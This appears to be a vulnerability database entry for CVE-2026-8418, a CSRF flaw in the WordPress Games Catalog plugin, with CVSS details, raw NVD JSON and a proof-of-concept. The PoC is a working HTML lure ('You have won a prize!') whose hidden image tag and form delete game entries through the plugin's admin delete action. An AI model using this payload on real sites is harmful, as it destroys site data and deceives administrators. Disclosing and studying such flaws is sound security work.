Security Vulnerability Report
中文
CVE-2026-8418 CVSS 4.3 MEDIUM

CVE-2026-8418

Published: 2026-05-20 02:16:40
Last Modified: 2026-05-20 13:54:55

Description

The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Games Catalog Plugin <= 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-8418: CSRF in Games Catalog Plugin Description: This script demonstrates how an unauthenticated attacker can delete a game entry by tricking an administrator into clicking a link. Usage: Replace 'http://target-site' with the actual target URL and '1' with a valid game ID. --> <html> <body> <h2>You have won a prize! Click to claim.</h2> <!-- The malicious request can be triggered via an image tag or form submission --> <img src="http://target-site/wp-admin/admin.php?page=games-catalog&action=delete&id=1" width="0" height="0" border="0" style="display:none;"> <!-- Or using a simple form to ensure the request is sent --> <form action="http://target-site/wp-admin/admin.php" method="GET"> <input type="hidden" name="page" value="games-catalog" /> <input type="hidden" name="action" value="delete" /> <input type="hidden" name="id" value="1" /> <input type="submit" value="Claim Prize" /> </form> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8418", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:39.827", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L31", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L94", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/games-catalog.php#L96", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L31", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L94", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/game-catalog/trunk/games-catalog.php#L96", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=cve", "source": "[email protected]"}]}}